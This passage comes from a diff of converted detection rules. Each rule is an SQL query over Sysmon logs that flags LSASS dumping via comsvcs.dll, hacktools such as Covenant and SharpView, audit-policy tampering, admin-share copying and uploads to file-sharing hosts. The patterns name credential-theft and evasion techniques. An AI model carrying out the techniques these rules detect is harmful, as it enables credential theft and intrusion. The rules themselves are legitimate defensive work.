'%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\tttracer.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_bitsadmin_download_file_sharing_domains.yml" + "filename": "proc_creation_win_lolbin_tttracer_mod_load.yml" }, { - "title": "Abused Debug Privilege by Arbitrary Parent Processes", - "id": "d522eca2-2973-4391-a3e0-ef0374321dae", + "title": "Audit Policy Tampering Via NT Resource Kit Auditpol", + "id": 
"c6c56ada-612b-42d1-9a29-adad3c5c2c1e", "status": "test", - "description": "Detection of unusual child processes by different system processes", - "author": "Semanur Guneysu @semanurtg, oscd.community", + "description": "Threat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1548" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Unknown" + "The old auditpol utility isn't available by default on recent versions of Windows as it was replaced by a newer version. The FP rate should be very low except for tools that use a similar flag structure" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\csrss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\searchindexer.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'Cmd.Exe'))) AND NOT (CommandLine LIKE '% route %' ESCAPE '\\' AND CommandLine LIKE '% ADD %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%/logon:none%' 
ESCAPE '\\' OR CommandLine LIKE '%/system:none%' ESCAPE '\\' OR CommandLine LIKE '%/sam:none%' ESCAPE '\\' OR CommandLine LIKE '%/privilege:none%' ESCAPE '\\' OR CommandLine LIKE '%/object:none%' ESCAPE '\\' OR CommandLine LIKE '%/process:none%' ESCAPE '\\' OR CommandLine LIKE '%/policy:none%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_abusing_debug_privilege.yml" + "filename": "proc_creation_win_auditpol_nt_resource_kit_usage.yml" }, { - "title": "HackTool - HandleKatz LSASS Dumper Execution", - "id": "ca621ba5-54ab-4035-9942-d378e6fcde3c", + "title": "Manage Engine Java Suspicious Sub Process", + "id": "cea2b7ea-792b-405f-95a1-b903ea06458f", "status": "experimental", - "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", + "description": "Detects suspicious sub processes started by the Manage Engine ServiceDesk Plus Java web service process", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], "falsepositives": [ - "Unknown" + "Legitimate sub processes started by Manage Engine ServiceDesk Pro" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\loader.exe' ESCAPE '\\' AND CommandLine LIKE '%--pid:%' ESCAPE '\\') OR (Imphash IN ('38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650') OR Hashes IN ('IMPHASH=38D9E015591BBFD4929E0D0F47FA0055', 'IMPHASH=0E2216679CA6E1094D63322E3412D650')) OR (CommandLine LIKE '%--pid:%' ESCAPE '\\' AND CommandLine LIKE '%--outfile:%' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%.obf%' ESCAPE '\\' OR CommandLine LIKE '%dump%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE 
'%\\\\ManageEngine\\\\ServiceDesk\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\java.exe%' ESCAPE '\\' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\')) AND NOT (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_handlekatz.yml" + "filename": "proc_creation_win_susp_manageengine_pattern.yml" }, { - "title": "Privilege Escalation via Named Pipe Impersonation", - "id": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", + "title": "Suspicious Usage Of ShellExec_RunDLL", + "id": "d87bd452-6da1-456e-8155-7dc988157b7d", "status": "experimental", - "description": "Detects a remote file copy attempt to a hidden network share. 
This may indicate lateral movement or data staging activity.", - "author": "Tim Rauch", + "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021" + "attack.defense_evasion" ], "falsepositives": [ - "Other programs that cause these patterns (please report)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE')) AND (CommandLine LIKE '%echo%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%odbcconf%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-%' ESCAPE '\\' OR CommandLine LIKE '%iex%' ESCAPE '\\' OR CommandLine LIKE '%comspec%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_priv_escalation_via_named_pipe.yml" + "filename": "proc_creation_win_rundll32_susp_shellexec_execution.yml" }, { - "title": "Potential Arbitrary Command Execution Using Msdt.EXE", - "id": "258fc8ce-8352-443a-9120-8a11e4857fa5", - "status": "experimental", - "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", - "author": "Nasreddine Bencherchali (Nextron 
Systems)", + "title": "Renamed ProcDump Execution", + "id": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", + "status": "test", + "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Procdump illegaly bundled with legitimate software", + "Administrators who rename binaries (should be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '%IT\\_BrowseForFile=%' ESCAPE '\\' OR (CommandLine LIKE '% PCWDiagnostic%' ESCAPE '\\' AND (CommandLine LIKE '% /af %' ESCAPE '\\' OR CommandLine LIKE '% -af %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'procdump' OR ((CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND (CommandLine LIKE '% -accepteula %' ESCAPE '\\' OR CommandLine LIKE '% /accepteula %' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_msdt_arbitrary_command_execution.yml" + "filename": "proc_creation_win_renamed_sysinternals_procdump.yml" }, { - "title": "HackTool - Covenant PowerShell Launcher", - "id": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", - "status": "test", - "description": "Detects suspicious command lines used in Covenant luanchers", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "title": "HackTool - SharpView Execution", + "id": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", + "status": "experimental", + "description": "Adversaries may look for details about the network configuration and settings of 
systems they access or through information discovery of remote systems", + "author": "frack113", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1059.001", - "attack.t1564.003" + "attack.discovery", + "attack.t1049", + "attack.t1069.002", + "attack.t1482", + "attack.t1135", + "attack.t1033" + ], + "falsepositives": [ + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%-Sta%' ESCAPE '\\' AND CommandLine LIKE '%-Nop%' ESCAPE '\\' AND CommandLine LIKE '%-Window%' ESCAPE '\\' AND CommandLine LIKE '%Hidden%' ESCAPE '\\' AND (CommandLine LIKE '%-Command%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\')) OR (CommandLine LIKE '%sv o (New-Object IO.MemorySteam);sv d %' ESCAPE '\\' OR CommandLine LIKE '%mshta file.hta%' ESCAPE '\\' OR CommandLine LIKE '%GruntHTTP%' ESCAPE '\\' OR CommandLine LIKE '%-EncodedCommand cwB2ACAAbwAgA%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'SharpView.exe' OR Image LIKE '%\\\\SharpView.exe' ESCAPE '\\' OR (CommandLine LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Convert-ADName%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-SID%' ESCAPE '\\' OR CommandLine LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR CommandLine LIKE '%Convert-SidToName%' ESCAPE '\\' OR CommandLine LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainProcess%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainShare%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR CommandLine LIKE '%Find-ForeignUser%' ESCAPE '\\' OR CommandLine LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR CommandLine LIKE 
'%Find-GPOLocation%' ESCAPE '\\' OR CommandLine LIKE '%Find-Interesting%' ESCAPE '\\' OR CommandLine LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR CommandLine LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-DFSshare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainController%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainForeign%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGPO%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainGUIDMap%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSID%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestGlobalCatalog%' ESCAPE '\\' OR CommandLine LIKE '%Get-ForestTrust%' ESCAPE '\\' OR CommandLine LIKE '%Get-GptTmpl%' ESCAPE '\\' OR CommandLine LIKE '%Get-GroupsXML%' ESCAPE '\\' OR CommandLine LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetComputer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetDomain%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetFileServer%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetForest%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetGPO%' ESCAPE '\\' OR CommandLine LIKE 
'%Get-NetGroupMember%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetOU%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetProcess%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSession%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetShare%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSite%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetSubnet%' ESCAPE '\\' OR CommandLine LIKE '%Get-NetUser%' ESCAPE '\\' OR CommandLine LIKE '%Get-PathAcl%' ESCAPE '\\' OR CommandLine LIKE '%Get-PrincipalContext%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegCachedRDPConnection%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegLastLoggedOn%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegMountedDrive%' ESCAPE '\\' OR CommandLine LIKE '%Get-WMIRegProxy%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Sharefinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR CommandLine LIKE '%Remove-DomainObjectAcl%' ESCAPE '\\' OR CommandLine LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR CommandLine LIKE '%Request-SPNTicket%' ESCAPE '\\' OR CommandLine LIKE '%Set-DomainObject%' ESCAPE '\\' OR CommandLine LIKE '%Test-AdminAccess%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_covenant.yml" + "filename": "proc_creation_win_hktl_sharpview.yml" }, { - "title": "System File Execution Location Anomaly", - "id": "e4a6b256-3e47-40fc-89d2-7a477edd6915", - "status": "experimental", - "description": "Detects a Windows program executable started from a 
suspicious folder", - "author": "Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali", + "title": "Process Dumping Via Comsvcs.DLL", + "id": "646ea171-dded-4578-8a4d-65e9822892e3", + "status": "test", + "description": "Detects a process memory dump via \"comsvcs.dll\" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)", + "author": "Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.credential_access", + "attack.t1036", + "attack.t1003.001", + "car.2013-05-009" ], "falsepositives": [ - "Exotic software" + "Unlikely, because no one should dump the process memory in that way" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\services.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsass.exe' ESCAPE '\\' OR Image LIKE '%\\\\smss.exe' ESCAPE '\\' OR Image LIKE '%\\\\csrss.exe' ESCAPE '\\' OR Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\wininit.exe' ESCAPE '\\' OR Image LIKE '%\\\\lsm.exe' ESCAPE '\\' OR Image LIKE '%\\\\winlogon.exe' ESCAPE '\\' OR Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\taskhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\Taskmgr.exe' ESCAPE '\\' OR Image LIKE '%\\\\sihost.exe' ESCAPE '\\' OR Image LIKE '%\\\\RuntimeBroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\smartscreen.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\audiodg.exe' ESCAPE '\\' OR Image LIKE '%\\\\wlanext.exe' ESCAPE '\\' OR Image 
LIKE '%\\\\dashost.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\atbroker.exe' ESCAPE '\\' OR Image LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certreq.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\consent.exe' ESCAPE '\\' OR Image LIKE '%\\\\defrag.exe' ESCAPE '\\' OR Image LIKE '%\\\\dism.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhst3g.exe' ESCAPE '\\' OR Image LIKE '%\\\\eventvwr.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\runonce.exe' ESCAPE '\\' OR Image LIKE '%\\\\winver.exe' ESCAPE '\\' OR Image LIKE '%\\\\logonui.exe' ESCAPE '\\' OR Image LIKE '%\\\\userinit.exe' ESCAPE '\\' OR Image LIKE '%\\\\dwm.exe' ESCAPE '\\' OR Image LIKE '%\\\\LsaIso.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntoskrnl.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dfrgui.exe' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\') OR Image LIKE '%\\\\SystemRoot\\\\System32\\\\%' ESCAPE '\\' OR (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\MicrosoftCorporationII.WindowsSubsystemForLinux%' ESCAPE '\\' AND Image LIKE '%\\\\wsl.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND (CommandLine LIKE '%comsvcs%' ESCAPE '\\' AND CommandLine 
LIKE '%full%' ESCAPE '\\' AND (CommandLine LIKE '%24 %' ESCAPE '\\' OR CommandLine LIKE '%#24%' ESCAPE '\\' OR CommandLine LIKE '%#+24%' ESCAPE '\\' OR CommandLine LIKE '%MiniDump%' ESCAPE '\\'))) OR CommandLine LIKE '%#-4294967272%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_system_exe_anomaly.yml" + "filename": "proc_creation_win_rundll32_process_dump_via_comsvcs.yml" }, { - "title": "Suspicious Dump64.exe Execution", - "id": "129966c9-de17-4334-a123-8b58172e664d", - "status": "test", - "description": "Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder", - "author": "Austin Songer @austinsonger, Florian Roth", + "title": "Suspicious Whoami.EXE Execution", + "id": "c30fb093-1109-4dc8-88a8-b30d11c95a5d", + "status": "experimental", + "description": "Detects the execution of \"whoami.exe\" with the \"/all\" flag or with redirection options to export the results to a file for later use.", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Dump64.exe in other folders than the excluded one" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\dump64.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Installer\\\\Feedback\\\\dump64.exe%' ESCAPE '\\')) OR (Image LIKE '%\\\\dump64.exe' ESCAPE '\\' AND (CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% -all%' ESCAPE '\\' OR CommandLine LIKE '% /all%' ESCAPE '\\' OR CommandLine LIKE '% /FO CSV%' ESCAPE '\\' OR CommandLine LIKE 
'% -FO CSV%' ESCAPE '\\')) OR (CommandLine LIKE '%whoami%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_dump64.yml" + "filename": "proc_creation_win_whoami_susp_flags.yml" }, { - "title": "RDP Connection Allowed Via Netsh.EXE", - "id": "01aeb693-138d-49d2-9403-c4f52d7d3d62", + "title": "Copy from Admin Share", + "id": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", "status": "test", - "description": "Detects usage of the netsh command to open and allow connections to port 3389 (RDP). As seen used by Sarwent Malware", - "author": "Sander Wiebing", + "description": "Detects a suspicious copy command to or from an Admin share or remote", + "author": "Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali", "tags": [ - "attack.defense_evasion", - "attack.t1562.004" + "attack.lateral_movement", + "attack.collection", + "attack.exfiltration", + "attack.t1039", + "attack.t1048", + "attack.t1021.002" ], "falsepositives": [ - "Legitimate administration activity" + "Administrative scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%tcp %' ESCAPE '\\' AND CommandLine LIKE '%3389%' ESCAPE '\\') AND (CommandLine LIKE '%portopening%' ESCAPE '\\' OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%allow%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\') OR CommandLine LIKE '%\\\\Sysvol\\\\%' ESCAPE '\\') AND ((((Image LIKE '%\\\\robocopy.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\xcopy.exe' ESCAPE '\\') OR OriginalFileName IN ('robocopy.exe', 'XCOPY.EXE')) OR ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND CommandLine LIKE '%copy%' ESCAPE '\\')) OR (((Image LIKE '%\\\\powershell.exe%' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe%' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%copy-item%' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%cpi %' ESCAPE '\\' OR CommandLine LIKE '% cp %' ESCAPE '\\' OR CommandLine LIKE '%move %' ESCAPE '\\' OR CommandLine LIKE '%move-item%' ESCAPE '\\' OR CommandLine LIKE '% mi %' ESCAPE '\\' OR CommandLine LIKE '% mv %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_netsh_fw_allow_rdp.yml" + "filename": "proc_creation_win_susp_copy_lateral_movement.yml" }, { - "title": "APT29 2018 Phishing Campaign CommandLine Indicators", - "id": "7453575c-a747-40b9-839b-125a0aae324b", + "title": "Suspicious Double Extension File Execution", + "id": "1cdd9a09-06c9-4769-99ff-626e2b3991b8", "status": "stable", - "description": "Detects indicators of APT 29 (Cozy Bear) phishing-campaign as reported by mandiant", - "author": "Florian Roth (Nextron Systems), @41thexplorer", + "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns", + "author": "Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1218.011" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE 